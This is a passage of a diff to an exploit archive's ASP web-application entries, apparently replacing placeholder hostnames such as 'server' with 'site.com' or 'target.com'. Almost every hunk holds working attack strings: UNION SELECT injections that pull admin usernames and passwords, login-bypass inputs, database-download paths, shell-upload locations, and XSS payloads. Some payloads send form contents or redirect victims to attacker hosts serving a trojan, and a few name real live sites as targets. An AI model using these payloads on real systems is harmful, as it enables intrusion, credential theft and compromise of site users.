#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################
# milw0rm.com [2006-08-20]

4
platforms/asp/webapps/2230.txt
View file

@ -17,11 +17,11 @@
################################################################################
###################################################################################################################
#Usage : http://server/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################
#################################################
#Admin Panel : http://server/path/admin #
#Admin Panel : http://www.target.com/path/admin #
#################################################
# milw0rm.com [2006-08-20]

4
platforms/asp/webapps/22673.txt
View file

@ -17,6 +17,6 @@ Cookie: philboard_admin=True;
Download the database (users and password):
Usually, the database location can be found and download it from:
http://server/database/philboard.mdb
http://www.target.com/database/philboard.mdb
or
http://server/forum/database/philboard.mdb
http://www.target.com/forum/database/philboard.mdb

4
platforms/asp/webapps/22866.txt
View file

@ -4,8 +4,8 @@ A cross-site scripting vulnerability has been reported for ProductCart. The vuln
Exploitation could permit an attacker to steal cookie-based authentication credentials or launch other attacks.
http://www.webserver/ProductCart/pc/msg.asp?message=><script>alert
http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert
(document.cookie);</script>
http://www.webserver/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
20width=400%20height=400></iframe>

4
platforms/asp/webapps/2287.txt
View file

@ -9,11 +9,11 @@
################################################################################
##########################################################################################################################################################################
#Usage : http://server/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
##########################################################################################################################################################################
#############################################################
#Admin Panel : http://server/path/admin/default.asp #
#Admin Panel : http://www.target.com/path/admin/default.asp #
#############################################################
# milw0rm.com [2006-09-01]

2
platforms/asp/webapps/2294.txt
View file

@ -9,7 +9,7 @@
#Price of Portal: 300YTL // Good money for Bad Script
#Exploit :
www.server /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
#BURCU Seni hep sevdim hep sevicem.

6
platforms/asp/webapps/2306.txt
View file

@ -9,15 +9,15 @@
################################################################################
##########################################################################################################################################################
#Username : http://server/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
##########################################################################################################################################################
#Password : http://server/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
################################################################
#Admin Panel : http://server/path/theadmin/default.asp #
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################
# milw0rm.com [2006-09-05]

4
platforms/asp/webapps/23571.txt
View file

@ -17,10 +17,10 @@ SelectSurvey CMS (ASP.NET) Shell Upload Vulnerability
exploit # /survey/UploadImagePopup.aspx
or http://survey.server/UploadImagePopup.aspx
or http://survey.site.com/UploadImagePopup.aspx
Upload to # http://server/UploadedImages/shell.asp
Upload to # http://site.com/UploadedImages/shell.asp
#######################################################

2
platforms/asp/webapps/2362.txt
View file

@ -6,7 +6,7 @@
# Vulnerable file : icerik.asp
exp :
http://server/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID )

2
platforms/asp/webapps/2592.htm
View file

@ -8,7 +8,7 @@
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="http://www.someserver/forum/doprofiledit.asp"><p><b>
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
<font color="#FF0000" face="Verdana" size="2">Email: </font></b>
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>

2
platforms/asp/webapps/26156.txt
View file

@ -6,4 +6,4 @@ Successful exploitation of this vulnerability could lead to a compromise of the
calculator.asp?cpaint_function=addNumbers&cpaint_argument[]=1&cpaint_argument[]=2")%20%26%20eval("malicious code
http://someserver/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code
http://someserver.com/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code

10
platforms/asp/webapps/26445.pl
View file

@ -69,8 +69,8 @@ An attacker can exploit these vulnerabilities to retrieve sensitive and privileg
# Connection closed by foreign host.
#
# exemple:
# www.server/comersus/database/comersus.mdb
# www.server/database/comersus.mdb
# www.site.com/comersus/database/comersus.mdb
# www.site.com/database/comersus.mdb
#
# Decryption vulnerability (all versions)
# the problem is that comersus encryption tool use
@ -122,11 +122,11 @@ An attacker can exploit these vulnerabilities to retrieve sensitive and privileg
# this issues are due to a failure in the application to properly sanitize user-supplied input. an attacker may exploit this vulnerability
# to have arbitrary script code executed in the browser
# blackofficeelite:
# server/comersus/backofficelite/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
# www.target.com/comersus/backofficelite/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
# or blackofficeplus
# server/comersus/backofficeplus/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
# www.target.com/comersus/backofficeplus/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
#
# server/comersus/backofficePlus/comersus_backoffice_supportError.asp?error=<script>alert('vul');</script>
# www.target.com/comersus/backofficePlus/comersus_backoffice_supportError.asp?error=<script>alert('vul');</script>
#
# i wrote the following code for testing and educational
# purposes, use it at your own risk and on your own machine

4
platforms/asp/webapps/2662.txt
View file

@ -24,10 +24,10 @@ Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum director
Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testserver&VDirName=test&ForumID=1
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testserver&VDirName=test&ForumID=
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1

2
platforms/asp/webapps/2782.txt
View file

@ -10,7 +10,7 @@ passwd: 'or''='
injection sql (post) :
http://server/search_list.asp
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... )

2
platforms/asp/webapps/28062.txt
View file

@ -4,4 +4,4 @@ Cisco CallManager is prone to a cross-site scripting vulnerability. This issue i
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting administrative user in the context of the affected site. This may help the attacker launch other attacks.
http://www.example.com/CallManagerAddress/ccmuser/logon.asp?userID=&password=&MadeUpParameter="><script>for (i=0; i<document.forms.length; i%2B%2B) document.forms[i].action="http://www.attackerserver/stealstuff.cgi";</script><!--
http://www.example.com/CallManagerAddress/ccmuser/logon.asp?userID=&password=&MadeUpParameter="><script>for (i=0; i<document.forms.length; i%2B%2B) document.forms[i].action="http://www.attackersite.com/stealstuff.cgi";</script><!--

6
platforms/asp/webapps/29024.txt
View file

@ -4,6 +4,6 @@ Inventory Manager is prone to multiple input-validation vulnerabilities, includi
Successful exploits of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
http://server/inventory/inventory/display/imager.asp?pictable='[sql]
http://server/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=[sql]
http://server/inventory/inventory/display/imager.asp?pictable=[inventory &picfield=photo&where='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory &picfield=photo&where='[sql]

4
platforms/asp/webapps/29500.txt
View file

@ -14,8 +14,8 @@ Google Dork: allinurl:RASPcalendar "powered by RASPcalendar"
------------------------------------------------------------
Example : http://www.usfim.it/RASPcalendar/
: http://server/events
: http://server/calendar
: http://site.com/events
: http://site.com/calendar
: etc...
Go to : http://www.usfim.it/RASPcalendar/admin/

2
platforms/asp/webapps/30204.txt
View file

@ -8,4 +8,4 @@ The attacker may also leverage this issue to execute arbitrary code in the brows
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_server/Trojan.exe"</script>
http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_Site.com/Trojan.exe"</script>

2
platforms/asp/webapps/30205.txt
View file

@ -8,4 +8,4 @@ The attacker may also leverage this issue to execute arbitrary code in the brows
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.server/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_server/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form>
http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.Site.com/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form>

2
platforms/asp/webapps/32157.txt
View file

@ -11,7 +11,7 @@ This vulnerability is an unprotected page on the site where you can view
all current users and usernames.
To find out if a Kentico CMS is vulnerable go to
http://server/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx
http://site.com/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx
assuming that the Kentico CMS was installed to the root folder in the
server.

2
platforms/asp/webapps/3233.txt
View file

@ -6,7 +6,7 @@
###############################################################
#Download Link Of Fullaspsite Asp Hosting Sitesi (tr) :
http://www.aspindir.com/Goster/4383
#Demo : http://aspsiteler.fullaspserver/hosting
#Demo : http://aspsiteler.fullaspsite.com/hosting
#Exploit;
#Admin Nick, Passport;

1
platforms/asp/webapps/32660.txt
View file

@ -11,3 +11,4 @@

2
platforms/asp/webapps/3339.txt
View file

@ -11,7 +11,7 @@ Bulan: xoron
Download: http://www.aspindir.com/Goster/3439
-----------------------------------------------------------------------
Exploit: http://server/ page.asp?art_id=[SQL]
Exploit: http://www.target.com/ page.asp?art_id=[SQL]
Username: page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1

2
platforms/asp/webapps/3466.txt
View file

@ -8,7 +8,7 @@
#####################################
-------
Exploit :
http://www.server/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Admin Panel : admin_default.asp
# milw0rm.com [2007-03-12]

2
platforms/asp/webapps/34753.py
View file

@ -29,7 +29,7 @@ if len(sys.argv) < 2:
print "| |"
print "| Onlineon E-Ticaret Database Disclosure Exploit (.py) |"
print "| ZoRLu / milw00rm.com |"
print "| exploit.py http://server/path/ |"
print "| exploit.py http://site.com/path/ |"
print "|____________________________________________________________________|"
sys.exit(1)

2
platforms/asp/webapps/3936.txt
View file

@ -12,6 +12,6 @@ Contact : kerem125@kerem125.com & by_gsy@hotmail.com
############################################################################################################
RunawaySoft Haber portal v1.0 (tr) Database Disclosure
Example: [server]/[path]/haber/data/xice.mdb
Example: [site.com]/[path]/haber/data/xice.mdb
# milw0rm.com [2007-05-16]

2
platforms/asp/webapps/4083.txt
View file

@ -10,7 +10,7 @@ Bug : in urunbak.asp
Down : http://www.aspdestek.net/uploads/20070518_092540_webmarket.rar
Site :
Exploit : http://server/script_path/urunbak.asp?id=25+union+select+0,1,parola,3,4,5,6+from+ayar
Exploit : http://site.com/script_path/urunbak.asp?id=25+union+select+0,1,parola,3,4,5,6+from+ayar
Note : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda]

2
platforms/asp/webapps/4198.txt
View file

@ -8,7 +8,7 @@ email:timq@hushmail.com
Vendor:http://www.rammdev.com/ashop/
PoC:
http://server/admin/filebrowser.asp?folder=products&delfiles=[del any file on server]
http://site.com/admin/filebrowser.asp?folder=products&delfiles=[del any file on server]
It is possible to delete not only the files in the folders listed,
but also ouside its directory.

2
platforms/asp/webapps/4609.txt
View file

@ -10,6 +10,6 @@
*
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit
*
* Exploit : Admin User / Password : http://www.server/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))
* Exploit : Admin User / Password : http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))
# milw0rm.com [2007-11-05]

20
platforms/asp/webapps/4848.txt
View file

@ -21,7 +21,7 @@ PortalApp is a Content Management System (CMS) for websites.
Bug: The user input 'sortby' is directly used in query statement!
#Exploit:
http://server/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users
http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users
author will be usernames
topic will be passwords
@ -34,7 +34,7 @@ views will be access levels (5 is super admin)
##############################################################################
create a forum:
<html>
<form action=http://server/forums.asp?action=insert_level1_edit_disc_forums method=post>
<form action=http://site.com/forums.asp?action=insert_level1_edit_disc_forums method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumName:<input type=text name=ForumName value="H4c|<3d bY r3dm0v3"><br>
Description:<input type=text name=Description value="r3dm0v3 was here. <a href=http://r3dm0v3.persianblog.ir>http://r3dm0v3.persianblog.ir</a>"><br>
@ -46,7 +46,7 @@ create a forum:
create a topic:
<html>
<form action=http://server/forums.asp?action=insert_level2_edit_disc_topics method=post>
<form action=http://site.com/forums.asp?action=insert_level2_edit_disc_topics method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumID:<input type=text name=ForumId value=><br>
Subject:<input type=text name=Subject value="r3dm0v3."><br>
@ -62,10 +62,10 @@ create a topic:
</form>
</html>
delete a forum: http://server/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
delete a topic: http://server/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
delete a reply: http://server/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
delete a topic reply: http://server/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]
delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]
#There some other actions:
insert_level3_edit_disc_replies
@ -82,7 +82,7 @@ update_level2_disc_replies
##############################################################################
Add content:
<html>
<form action=http://server/content.asp?action=insert_detail_default method=post>
<form action=http://site.com/content.asp?action=insert_detail_default method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ContentTypeID:<input type=text name=ContentTypeID value=2>1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...<br>
catID:<input type=text name=CatID value=198><br>
@ -110,7 +110,7 @@ Add content:
##############################################################################
# XSS #
##############################################################################
http://server/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://server/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
# milw0rm.com [2008-01-06]

4
platforms/asp/webapps/5717.txt
View file

@ -15,9 +15,9 @@ Dork : "Powered by i-pos Storefront"
Attackz;
Http://Localserver/path/index.asp?item=[SQL Injection]
Http://Localsite.com/path/index.asp?item=[SQL Injection]
Example Attack: http://localserver/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
Example Attack: http://localsite.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
Example Site: www.keysquality.com/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
######################################################################################################

2
platforms/asp/webapps/6405.txt
View file

@ -10,7 +10,7 @@
#
# Google D0rk : allinurl:index.asp?sideid=
POC : www.server/index.asp?sideid=[SQL]
POC : www.site.com/index.asp?sideid=[SQL]
SQL : 1+union+select+concat(username,0x3a,password),2,3+from+login/*

8
platforms/asp/webapps/6420.txt
View file

@ -18,11 +18,11 @@
#
#--# 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] #
#
http://www.server/path/album.asp?action=uploadmedia&cat=Real Category Name! #
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! #
#
and your shell adress: #
#
http://www.server/path/album/categories/Real Category Name!/pics/yourshell.asp #
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp #
#
#
ex:1 #
@ -36,7 +36,7 @@ Ablaze rally 9-24-06/pics/klasvayv.asp
#--# 2-Admin Bypass [AspWebAlbum 3.2] #
#
#
http://server/path/album.asp?action=login #
http://site.com/path/album.asp?action=login #
#
ASP/MS SQL Server login syntax #
#
@ -46,7 +46,7 @@ Password:anything
#
#--# 3-Xss Vulnerability [AspWebAlbum 3.2] #
#
http://server/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #
http://site.com/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #
#
##################################################################################################

6
platforms/asp/webapps/6453.txt
View file

@ -13,7 +13,7 @@ Exploit : For username
you can read username on title
www.server/script_path/izle.asp?oyun=56+union+select+0,1,KULLANICIADI,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI
www.site.com/script_path/izle.asp?oyun=56+union+select+0,1,KULLANICIADI,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI
**************************************************************************************
@ -21,13 +21,13 @@ Exploit : For Password(md5 hash)
you can read password on title
www.server/script_path/izle.asp?oyun=56+union+select+0,1,PAROLA,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI
www.site.com/script_path/izle.asp?oyun=56+union+select+0,1,PAROLA,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI
**************************************************************************************
Administrator Path
www.server/script_path/yonetim_default.asp
www.site.com/script_path/yonetim_default.asp
**************************************************************************************

2
platforms/asp/webapps/6731.txt
View file

@ -8,7 +8,7 @@
#################################################################################################
### POC
www.server/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))
### Exploit :

2
platforms/asp/webapps/7325.txt
View file

@ -35,7 +35,7 @@
#Exploit :
http://server/db/MailingList.mdb
http://target.com/db/MailingList.mdb
#live example :

2
platforms/asp/webapps/7340.txt
View file

@ -11,7 +11,7 @@
# easy to update. Free license under the GPL.
#
# Exploit:
# server/Database/News.mdb
# SITE.COM/Database/News.mdb
# D0rk : "powered by easy-news.org"
#
# -------------------------------

2
platforms/asp/webapps/7349.txt
View file

@ -18,7 +18,7 @@
#Exploit :
http://server/rankup.asp?siteID=convert(int,(select+@@version));--
http://target.com/rankup.asp?siteID=convert(int,(select+@@version));--
#Live Demo
http://www.top50.co.nz/rankup.asp?siteID=convert(int,(select+top+1+siteUserName+from+TBLsites));--

2
platforms/asp/webapps/7350.txt
View file

@ -19,7 +19,7 @@
#Exploit :
http://server/login.asp
http://target.com/login.asp
username : ' or '1'='1
password : ' or '1'='1

2
platforms/asp/webapps/7353.txt
View file

@ -6,7 +6,7 @@ script: Cold BBS
download from:http://www.peachydandy.com/scripts/download.php?go=2&file=4&mirror=7
***************************************************************************
www.server/path/db/cforum.mdb
www.site.com/path/db/cforum.mdb
***************************************************

Some files were not shown because too many files have changed in this diff Show more